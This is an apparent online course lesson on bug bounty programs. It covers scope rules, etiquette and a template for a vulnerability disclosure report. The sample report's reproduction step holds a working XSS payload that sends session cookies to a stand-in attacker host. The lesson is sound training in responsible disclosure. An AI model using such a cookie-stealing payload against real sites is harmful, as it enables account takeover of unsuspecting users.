█
LastWrite
  • > Curriculum
  • > Pricing
  • > For Educators
  • > About
  • > Contact
Log InGet Started

Questions, concerns, bug reports, or suggestions? We read every message, write to us at [email protected].

More ways to reach us →
LastWrite

Structured computer science lessons for aspiring developers and security professionals.

[email protected]

(201) 785-7951

Mon–Fri, 9 AM–5 PM EST

Learn

  • Curriculum
  • Pricing

Company

  • About
  • For Educators & Schools
  • Contact Us

Legal

  • Terms of Service
  • Privacy Policy
© 2026 LastWrite. All rights reserved.
Curriculum/Cybersecurity/Application Security/Bug Bounty Programs
45 minIntermediate

Bug Bounty Programs

After this lesson, you will be able to: Understand how bug bounty programs work, navigate HackerOne and Bugcrowd scope rules, and write a professional vulnerability disclosure report.

Bug bounty is the most public AppSec portfolio you can build. A single accepted report on HackerOne is worth more on a resume than most certifications. This lesson covers the operating model, the etiquette, and the report quality that gets paid.

Prerequisites:Security Code Review

How bug bounty actually works

Companies publish a program with a scope (URLs/domains/apps in-scope, exclusions, accepted vulnerability classes) and a reward structure (severity tier → payout range). Researchers find a vulnerability, write a report, submit through the platform. Triage validates, the company patches, and the researcher gets paid. The platforms (HackerOne, Bugcrowd, Intigriti, YesWeHack) handle payment, communication, and dispute resolution.

Scope is sacred

Out-of-scope testing is not 'bonus'. It is a crime, even on a public program. Read the scope page in full before you touch anything. Note: in-scope assets, excluded subdomains, prohibited vulnerability classes (e.g., DoS often excluded), retesting rules, and disclosure timelines. If in doubt, ask the program through the platform's safe communication channel, never DM employees.

ℹ️ The most expensive mistake new bug hunters make

Testing 'just the login form' on a subdomain that's out of scope, then filing a report. The program rejects the report (no payout), the platform notes the scope violation on your profile, and a serious company may file charges if intent looks malicious. Always confirm scope before sending the first packet.

Anatomy of a report that gets paid

This structure is the difference between 'closed as informational' and 'paid $1,500'.

tsx
# Title: Reflected XSS in /search via 'q' parameter (no CSP, cookies stealable)
## Summary
The /search endpoint reflects the 'q' query parameter without HTML encoding, allowing a one-click stored-XSS chain via the cached search history endpoint.
## Severity
High. Authenticated session cookies are stealable; CSP is not present.
## Steps to reproduce
1. Log into acme.example.com with a test account
2. Visit https://acme.example.com/search?q=<script>fetch('https://attacker.example/?c='+document.cookie)</script>
3. Observe the script executes and the attacker receives the cookie
4. The payload is also stored in the search history endpoint and re-fires on later /history visits
## Impact
Account takeover via session cookie theft. Affects any logged-in user who follows a crafted link.
## Recommended fix
HTML-encode the 'q' parameter on render (the existing app/lib/template.escapeHtml helper). Add Content-Security-Policy: default-src 'self'. Clear the cached search-history JSON for affected users.
## Proof of concept
<short PoC link, demo video, or screenshot>

Your first 30 days on a platform

Follow this exact sequence. The temptation to skip steps will get your account flagged.

  1. 1

    Create HackerOne and Bugcrowd accounts; complete the platform tutorials

  2. 2

    Read 'Hacktivity' (HackerOne's public report feed); pick 5 reports rated High or Critical and study how they're written

  3. 3

    Set up Burp Community + Foxyproxy on a dedicated browser profile (Firefox is easiest)

  4. 4

    Pick a beginner-friendly program (HackerOne tags some as 'first-time hackers'; usually government VDPs with smaller payouts but friendlier triage)

  5. 5

    Read the scope page TWICE before any testing

  6. 6

    Focus on one vulnerability class first (e.g., IDOR in account-management endpoints). Depth beats breadth.

  7. 7

    If you find something, draft the report with the structure above; sleep on it; submit the next day after a final scope re-read

Common mistakes only paid bounty hunters avoid

Reporting a clickjacking on a domain that has no sensitive actions. Triage closes these as informational and your signal-to-noise drops. Reporting a self-XSS as 'critical XSS'. Self-XSS is when the attack requires the victim to attack themselves; it's rarely paid. Using automated scanners on programs that explicitly ban them. Filing duplicates (someone else found it first); learn to read scope rules including 'duplicate at triage' policies. Communicating outside the platform. Some programs DM, some don't; never push for off-platform contact.

Quick Check

You find a critical vulnerability on a subdomain not listed in scope. What do you do?

Pick the correct sequence.

Sign in and purchase access to unlock this lesson.

Sign in to purchase
←Security Code Review
Back to Application Security
Application Security Resources and Next Steps→